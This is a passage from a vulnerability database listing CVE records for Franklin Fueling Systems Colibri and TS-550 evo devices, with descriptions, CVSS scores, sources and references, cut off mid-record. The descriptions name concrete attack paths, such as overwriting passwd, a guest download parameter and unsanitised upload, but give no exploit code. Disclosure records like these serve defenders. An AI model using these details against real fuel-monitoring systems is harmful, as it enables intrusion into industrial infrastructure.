Search
Find a vulnerability
Search criteria
11 vulnerabilities by franklinfueling
VAR-202212-0486
Vulnerability from variot - Updated: 2025-04-25 01:48Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). ¶¶ An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of "fopen" system function with the mode "wb" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202212-0486",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "colibri",
"scope": "eq",
"trust": 1.0,
"vendor": "franklinfueling",
"version": "1.9.22.8925"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"cve": "CVE-2022-44039",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-44039",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-44039",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-44039",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202212-2507",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202212-2507"
},
{
"db": "NVD",
"id": "CVE-2022-44039"
},
{
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling System FFS Colibri 1.9.22.8925 is affected by: File system overwrite. The impact is: File system rewrite (remote). \u00b6\u00b6 An attacker can overwrite system files like [system.conf] and [passwd], this occurs because the insecure usage of \"fopen\" system function with the mode \"wb\" which allows overwriting file if exists. Overwriting files such as passwd, allows an attacker to escalate his privileges by planting backdoor user with root privilege or change root password",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-44039"
},
{
"db": "VULHUB",
"id": "VHN-441228"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-44039",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-202212-2507",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-441228",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-441228"
},
{
"db": "CNNVD",
"id": "CNNVD-202212-2507"
},
{
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"id": "VAR-202212-0486",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-441228"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-25T01:48:52.113000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-441228"
},
{
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://pastebin.com/raw/64stbswu"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-44039/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-441228"
},
{
"db": "CNNVD",
"id": "CNNVD-202212-2507"
},
{
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-441228"
},
{
"db": "CNNVD",
"id": "CNNVD-202212-2507"
},
{
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-05T00:00:00",
"db": "VULHUB",
"id": "VHN-441228"
},
{
"date": "2022-12-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202212-2507"
},
{
"date": "2022-12-05T21:15:10.280000",
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-441228"
},
{
"date": "2022-12-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202212-2507"
},
{
"date": "2025-04-24T14:15:39.200000",
"db": "NVD",
"id": "CVE-2022-44039"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202212-2507"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling System Colibri Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202212-2507"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202212-2507"
}
],
"trust": 0.6
}
}
VAR-201705-3685
Vulnerability from variot - Updated: 2025-04-20 23:29On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the Guest user, which contains the lowest privileges, can post to the idSourceFileName parameter found within the /download directory. This ability allows for an attacker to download sensitive system files from the host machine such as databases which contain information that can aid in further attacks. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-3685",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.6,
"vendor": "franklinfueling",
"version": "2.3.0.7332"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.3.0.7332"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-389"
},
{
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
}
]
},
"cve": "CVE-2017-6564",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2017-6564",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-114767",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-6564",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-6564",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2017-6564",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-389",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-114767",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114767"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-389"
},
{
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the Guest user, which contains the lowest privileges, can post to the idSourceFileName parameter found within the /download directory. This ability allows for an attacker to download sensitive system files from the host machine such as databases which contain information that can aid in further attacks. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6564"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"db": "VULHUB",
"id": "VHN-114767"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-6564",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003716",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-389",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-114767",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114767"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-389"
},
{
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"id": "VAR-201705-3685",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-114767"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:29:41.897000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TS-550 evo \u0026 TS-5000 evo",
"trust": 0.8,
"url": "http://www.franklinfueling.com/americas/fms/featured/1697/en/ts-550-evo-ts-5000-evo#Highlights"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114767"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.u235.io/single-post/2017/05/01/penetrating-fuel-management-systems"
},
{
"trust": 1.7,
"url": "https://gist.github.com/stick-u235/b187931f828e92866d09b9bdeb956ca2"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6564"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-6564"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114767"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-389"
},
{
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-114767"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-389"
},
{
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-01T00:00:00",
"db": "VULHUB",
"id": "VHN-114767"
},
{
"date": "2017-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"date": "2017-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-389"
},
{
"date": "2017-05-01T19:59:00.160000",
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-114767"
},
{
"date": "2017-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003716"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-389"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-6564"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-389"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling Systems TS-550 evo Device access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003716"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-389"
}
],
"trust": 0.6
}
}
VAR-201705-3686
Vulnerability from variot - Updated: 2025-04-20 23:25On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the roleDiag user, which can be obtained by exploiting CVE-2013-7247, has the ability to upload files to the server hosting the web service. As no sanitization checks are in place, an attacker can upload a malicious payload. Franklin Fueling Systems TS-550 evo is a fuel management system from Franklin Fueling Systems in the United States. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A security vulnerability exists in Franklin Fueling Systems TS-550 evo version 2.3.0.7332
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-3686",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.6,
"vendor": "franklinfueling",
"version": "2.3.0.7332"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.3.0.7332"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-388"
},
{
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
}
]
},
"cve": "CVE-2017-6565",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2017-6565",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-114768",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-6565",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-6565",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-6565",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-388",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-114768",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114768"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-388"
},
{
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the roleDiag user, which can be obtained by exploiting CVE-2013-7247, has the ability to upload files to the server hosting the web service. As no sanitization checks are in place, an attacker can upload a malicious payload. Franklin Fueling Systems TS-550 evo is a fuel management system from Franklin Fueling Systems in the United States. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A security vulnerability exists in Franklin Fueling Systems TS-550 evo version 2.3.0.7332",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6565"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"db": "VULHUB",
"id": "VHN-114768"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-6565",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003717",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-388",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-114768",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114768"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-388"
},
{
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"id": "VAR-201705-3686",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-114768"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:25:02.535000Z",
"patch": {
"@context": {
